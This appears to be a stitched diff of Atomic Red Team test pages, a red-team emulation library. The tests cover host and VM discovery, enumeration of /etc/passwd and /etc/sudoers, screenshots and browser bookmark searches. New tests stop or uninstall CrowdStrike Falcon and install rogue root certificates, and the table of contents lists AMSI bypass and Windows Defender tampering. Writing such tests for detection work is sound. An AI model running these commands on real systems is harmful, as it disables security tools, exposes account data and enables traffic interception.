-uptime >> /tmp/loot.txt
-cat /etc/issue >> /tmp/loot.txt
+uname -a >> #{output_file}
+if [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi;
+if [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi;      
+if [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi;
+uptime >> #{output_file}
+cat #{output_file} 2>/dev/null
 ```

+#### Cleanup Commands:
+```sh
+rm #{output_file} 2>/dev/null
+```



@@ -135,14 +144,14 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot


 ```bash
-cat /sys/class/dmi/id/bios_version | grep -i amazon
-cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
-cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
-sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"
-cat /proc/scsi/scsi | grep -i "vmware\|vbox"
-cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"
-sudo lspci | grep -i "vmware\|virtualbox"
-sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
+if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;
+if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi;
+if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi;
+if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi;
+if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi;
+if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi;
+if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox"
+if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft"
 ```


@@ -94,20 +94,30 @@ https://perishablepress.com/list-files-folders-recursively-terminal/



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Output file used to store the results. | path | /tmp/T1083.txt|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-ls -a > allcontents.txt
-ls -la /Library/Preferences/ > detailedprefsinfo.txt
-file */* *>> ../files.txt
+ls -a >> #{output_file}
+if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;
+file */* *>> #{output_file}
+cat #{output_file} 2>/dev/null
 find . -type f
 ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/'
 locate *
 which sh
 ```

+#### Cleanup Commands:
+```sh
+rm #{output_file}
+```



@@ -124,20 +134,30 @@ Find or discover files on the file system



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Output file used to store the results. | path | /tmp/T1083.txt|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
-cat /etc/mtab > /tmp/loot.txt
-find . -type f -iname *.pdf > /tmp/loot.txt
+cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}
+if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;
+find . -type f -iname *.pdf >> #{output_file}
+cat #{output_file}; fi;
 find . -type f -name ".*"
 ```

+#### Cleanup Commands:
+```sh
+rm #{output_file}
+```
+




-
 <br/>
@@ -62,7 +62,7 @@ Enumerate all accounts by copying /etc/passwd to another file
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | ~/loot.txt|
+| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt|


 #### Attack Commands: Run with `sh`! 
@@ -70,8 +70,13 @@ Enumerate all accounts by copying /etc/passwd to another file

 ```sh
 cat /etc/passwd > #{output_file}
+cat #{output_file}
 ```

+#### Cleanup Commands:
+```sh
+rm -f #{output_file}
+```



@@ -91,16 +96,21 @@ cat /etc/passwd > #{output_file}
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | ~/loot.txt|
+| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt|


-#### Attack Commands: Run with `sh`! 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 


 ```sh
 cat /etc/sudoers > #{output_file}
+cat #{output_file}
 ```

+#### Cleanup Commands:
+```sh
+rm -f #{output_file}
+```



@@ -120,7 +130,7 @@ View accounts wtih UID 0
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | ~/loot.txt|
+| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt|


 #### Attack Commands: Run with `sh`! 
@@ -128,8 +138,13 @@ View accounts wtih UID 0

 ```sh
 grep 'x:0:' /etc/passwd > #{output_file}
+cat #{output_file} 2>/dev/null
 ```

+#### Cleanup Commands:
+```sh
+rm -f #{output_file} 2>/dev/null
+```



@@ -173,7 +188,7 @@ Show if a user account has ever logged in remotely
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Path where captured results will be placed | Path | ~/loot.txt|
+| output_file | Path where captured results will be placed | Path | /tmp/T1087.txt|


 #### Attack Commands: Run with `sh`! 
@@ -181,10 +196,27 @@ Show if a user account has ever logged in remotely

 ```sh
 lastlog > #{output_file}
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```sh
+rm -f #{output_file}
 ```



+#### Dependencies:  Run with `sh`!
+##### Description: Check if lastlog command exists on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; 
+```
+##### Get Prereq Commands:
+```sh
+echo "Install lastlog on the machine to run the test."; exit 1;
+```
+



@@ -12,35 +12,41 @@

 - [Atomic Test #4 - Disable SELinux](#atomic-test-4---disable-selinux)

- [Atomic Test #5 - Disable Carbon Black Response](#atomic-test-5---disable-carbon-black-response)
+- [Atomic Test #5 - Stop Crowdstrike Falcon on Linux](#atomic-test-5---stop-crowdstrike-falcon-on-linux)

- [Atomic Test #6 - Disable LittleSnitch](#atomic-test-6---disable-littlesnitch)
+- [Atomic Test #6 - Disable Carbon Black Response](#atomic-test-6---disable-carbon-black-response)

- [Atomic Test #7 - Disable OpenDNS Umbrella](#atomic-test-7---disable-opendns-umbrella)
+- [Atomic Test #7 - Disable LittleSnitch](#atomic-test-7---disable-littlesnitch)

- [Atomic Test #8 - Unload Sysmon Filter Driver](#atomic-test-8---unload-sysmon-filter-driver)
+- [Atomic Test #8 - Disable OpenDNS Umbrella](#atomic-test-8---disable-opendns-umbrella)

- [Atomic Test #9 - Disable Windows IIS HTTP Logging](#atomic-test-9---disable-windows-iis-http-logging)
+- [Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS](#atomic-test-9---stop-and-unload-crowdstrike-falcon-on-macos)

- [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon)
+- [Atomic Test #10 - Unload Sysmon Filter Driver](#atomic-test-10---unload-sysmon-filter-driver)

- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
+- [Atomic Test #11 - Disable Windows IIS HTTP Logging](#atomic-test-11---disable-windows-iis-http-logging)

- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)
+- [Atomic Test #12 - Uninstall Sysmon](#atomic-test-12---uninstall-sysmon)

- [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service)
+- [Atomic Test #13 - AMSI Bypass - AMSI InitFailed](#atomic-test-13---amsi-bypass---amsi-initfailed)

- [Atomic Test #14 - Tamper with Windows Defender ATP PowerShell](#atomic-test-14---tamper-with-windows-defender-atp-powershell)
+- [Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14---amsi-bypass---remove-amsi-provider-reg-key)

- [Atomic Test #15 - Tamper with Windows Defender Command Prompt](#atomic-test-15---tamper-with-windows-defender-command-prompt)
+- [Atomic Test #15 - Disable Arbitrary Security Windows Service](#atomic-test-15---disable-arbitrary-security-windows-service)

- [Atomic Test #16 - Tamper with Windows Defender Registry](#atomic-test-16---tamper-with-windows-defender-registry)
+- [Atomic Test #16 - Tamper with Windows Defender ATP PowerShell](#atomic-test-16---tamper-with-windows-defender-atp-powershell)

- [Atomic Test #17 - Disable Microft Office Security Features](#atomic-test-17---disable-microft-office-security-features)
+- [Atomic Test #17 - Tamper with Windows Defender Command Prompt](#atomic-test-17---tamper-with-windows-defender-command-prompt)

- [Atomic Test #18 - Remove Windows Defender Definition Files](#atomic-test-18---remove-windows-defender-definition-files)
+- [Atomic Test #18 - Tamper with Windows Defender Registry](#atomic-test-18---tamper-with-windows-defender-registry)

- [Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-19---stop-and-remove-arbitrary-security-windows-service)
+- [Atomic Test #19 - Disable Microft Office Security Features](#atomic-test-19---disable-microft-office-security-features)
+
+- [Atomic Test #20 - Remove Windows Defender Definition Files](#atomic-test-20---remove-windows-defender-definition-files)
+
+- [Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-21---stop-and-remove-arbitrary-security-windows-service)
+
+- [Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows](#atomic-test-22---uninstall-crowdstrike-falcon-on-windows)


 <br/>
@@ -164,7 +170,37 @@ setenforce 0
 <br/>
 <br/>

-## Atomic Test #5 - Disable Carbon Black Response
+## Atomic Test #5 - Stop Crowdstrike Falcon on Linux
+Stop and disable Crowdstrike Falcon on Linux
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo systemctl stop falcon-sensor.service
+sudo systemctl disable falcon-sensor.service
+```
+
+#### Cleanup Commands:
+```sh
+sudo systemctl enable falcon-sensor.service
+sudo systemctl start falcon-sensor.service
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Disable Carbon Black Response
 Disables Carbon Black Response

 **Supported Platforms:** macOS
@@ -188,7 +224,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
 <br/>
 <br/>

-## Atomic Test #6 - Disable LittleSnitch
+## Atomic Test #7 - Disable LittleSnitch
 Disables LittleSnitch

 **Supported Platforms:** macOS
@@ -212,7 +248,7 @@ sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 <br/>
 <br/>

-## Atomic Test #7 - Disable OpenDNS Umbrella
+## Atomic Test #8 - Disable OpenDNS Umbrella
 Disables OpenDNS Umbrella

 **Supported Platforms:** macOS
@@ -236,7 +272,38 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
 <br/>
 <br/>

-## Atomic Test #8 - Unload Sysmon Filter Driver
+## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS
+Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
+
+**Supported Platforms:** macOS
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist|
+| userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo launchctl unload #{falcond_plist}
+sudo launchctl unload #{userdaemon_plist}
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Unload Sysmon Filter Driver
 Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
 run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".

@@ -307,7 +374,7 @@ sysmon -accepteula -i
 <br/>
 <br/>

-## Atomic Test #9 - Disable Windows IIS HTTP Logging
+## Atomic Test #11 - Disable Windows IIS HTTP Logging
 Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
 This action requires HTTP logging configurations in IIS to be unlocked.

@@ -341,7 +408,7 @@ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:htt
 <br/>
 <br/>

-## Atomic Test #10 - Uninstall Sysmon
+## Atomic Test #12 - Uninstall Sysmon
 Uninstall Sysinternals Sysmon for Defense Evasion

 **Supported Platforms:** Windows
@@ -399,7 +466,7 @@ cmd /c sysmon -i -accepteula
 <br/>
 <br/>

-## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
+## Atomic Test #13 - AMSI Bypass - AMSI InitFailed
 Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
 Upon execution, no output is displayed.

@@ -430,7 +497,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
 <br/>
 <br/>

-## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
+## Atomic Test #14 - AMSI Bypass - Remove AMSI Provider Reg Key
 With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
 This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
 Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
@@ -460,7 +527,7 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
 <br/>
 <br/>

-## Atomic Test #13 - Disable Arbitrary Security Windows Service
+## Atomic Test #15 - Disable Arbitrary Security Windows Service
 With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
 Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
 To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
@@ -497,7 +564,7 @@ net.exe start #{service_name} >nul 2>&1
 <br/>
 <br/>

-## Atomic Test #14 - Tamper with Windows Defender ATP PowerShell
+## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
 Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
 in Windows settings.

@@ -532,7 +599,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
 <br/>
 <br/>

-## Atomic Test #15 - Tamper with Windows Defender Command Prompt
+## Atomic Test #17 - Tamper with Windows Defender Command Prompt
 Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
 However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
 will be displayed twice and the WinDefend service status will be displayed.
@@ -565,7 +632,7 @@ sc config WinDefend start=enabled >nul 2>&1
 <br/>
 <br/>

-## Atomic Test #16 - Tamper with Windows Defender Registry
+## Atomic Test #18 - Tamper with Windows Defender Registry
 Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
 grayed out and have no info.

@@ -594,7 +661,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
 <br/>
 <br/>

-## Atomic Test #17 - Disable Microft Office Security Features
+## Atomic Test #19 - Disable Microft Office Security Features
 Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
 show any warning before editing the document.

@@ -633,7 +700,7 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
 <br/>
 <br/>

-## Atomic Test #18 - Remove Windows Defender Definition Files
+## Atomic Test #20 - Remove Windows Defender Definition Files
 Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
 On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
 command will say completed.
@@ -661,7 +728,7 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
 <br/>
 <br/>

-## Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service
+## Atomic Test #21 - Stop and Remove Arbitrary Security Windows Service
 Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.

 **Supported Platforms:** Windows
@@ -688,4 +755,33 @@ Remove-Service -Name #{service_name}



+<br/>
+<br/>
+
+## Atomic Test #22 - Uninstall Crowdstrike Falcon on Windows
+Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:&#92;ProgramData&#92;Package Cache&#92;{7489ba93-b668-447f-8401-7e57a6fe538d}&#92;WindowsSensor.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
+```
+
+
+
+
+
+
 <br/>
@@ -34,7 +34,7 @@ Use screencapture command to collect a full desktop screenshot
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Output file path | Path | desktop.png|
+| output_file | Output file path | Path | /tmp/T1113_desktop.png|


 #### Attack Commands: Run with `bash`! 
@@ -44,6 +44,10 @@ Use screencapture command to collect a full desktop screenshot
 screencapture #{output_file}
 ```

+#### Cleanup Commands:
+```bash
+rm #{output_file}
+```



@@ -63,7 +67,7 @@ Use screencapture command to collect a full desktop screenshot
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Output file path | Path | desktop.png|
+| output_file | Output file path | Path | /tmp/T1113_desktop.png|


 #### Attack Commands: Run with `bash`! 
@@ -73,6 +77,10 @@ Use screencapture command to collect a full desktop screenshot
 screencapture -x #{output_file}
 ```

+#### Cleanup Commands:
+```bash
+rm #{output_file}
+```



@@ -92,7 +100,7 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Output file path | Path | desktop.xwd|
+| output_file | Output file path | Path | /tmp/T1113_desktop.xwd|


 #### Attack Commands: Run with `bash`! 
@@ -103,6 +111,10 @@ xwd -root -out #{output_file}
 xwud -in #{output_file}
 ```

+#### Cleanup Commands:
+```bash
+rm #{output_file}
+```



@@ -122,7 +134,7 @@ Use import command to collect a full desktop screenshot
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| output_file | Output file path | Path | desktop.png|
+| output_file | Output file path | Path | /tmp/T1113_desktop.png|


 #### Attack Commands: Run with `bash`! 
@@ -132,6 +144,10 @@ Use import command to collect a full desktop screenshot
 import -window root #{output_file}
 ```

+#### Cleanup Commands:
+```bash
+rm #{output_file}
+```



@@ -14,6 +14,12 @@ In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -

 - [Atomic Test #1 - Install root CA on CentOS/RHEL](#atomic-test-1---install-root-ca-on-centosrhel)

+- [Atomic Test #2 - Install root CA on Debian/Ubuntu](#atomic-test-2---install-root-ca-on-debianubuntu)
+
+- [Atomic Test #3 - Install root CA on macOS](#atomic-test-3---install-root-ca-on-macos)
+
+- [Atomic Test #4 - Install root CA on Windows](#atomic-test-4---install-root-ca-on-windows)
+

 <br/>

@@ -37,7 +43,7 @@ Creates a root CA with openssl

 ```sh
 openssl genrsa -out #{key_filename} 4096
-openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
+openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}

 if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ];
 then
@@ -53,4 +59,141 @@ fi



+<br/>
+<br/>
+
+## Atomic Test #2 - Install root CA on Debian/Ubuntu
+Creates a root CA with openssl
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
+| cert_filename | CA file name | Path | rootCA.crt|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+mv #{cert_filename} /usr/local/share/ca-certificates
+echo sudo update-ca-certificates
+```
+
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Verify the certificate exists. It generates if not on disk.
+##### Check Prereq Commands:
+```cmd
+if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
+```
+##### Get Prereq Commands:
+```cmd
+if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
+openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Install root CA on macOS
+Creates a root CA with openssl
+
+**Supported Platforms:** macOS
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
+| cert_filename | CA file name | Path | rootCA.crt|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
+```
+
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Verify the certificate exists. It generates if not on disk.
+##### Check Prereq Commands:
+```cmd
+if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
+```
+##### Get Prereq Commands:
+```cmd
+if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
+openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Install root CA on Windows
+Creates a root CA with Powershell
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| pfx_path | Path of the certificate | Path | rootCA.cer|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root"
+```
+
+#### Cleanup Commands:
+```cmd
+$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
+Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Verify the certificate exists. It generates if not on disk.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{cert_filename}) { exit 0 } else { exit 1 } 
+```
+##### Get Prereq Commands:
+```powershell
+$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path}
+Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
+```
+
+
+
+
 <br/>
@@ -29,14 +29,24 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Firefox.txt|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
+find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \;
+cat #{output_file} 2>/dev/null
 ```

+#### Cleanup Commands:
+```sh
+rm -f #{output_file} 2>/dev/null
+```



@@ -53,14 +63,24 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed. | Path | /tmp/T1217_Firefox.txt|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
+find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \;
+cat #{output_file} 2>/dev/null
 ```

+#### Cleanup Commands:
+```sh
+rm -f #{output_file} 2>/dev/null
+```



@@ -77,14 +97,24 @@ Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in



+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Chrome.txt|
+

 #### Attack Commands: Run with `sh`! 


 ```sh
-find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt \;
+find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \;
+cat #{output_file} 2>/dev/null
 ```

+#### Cleanup Commands:
+```sh
+rm -f #{output_file} 2>/dev/null
+```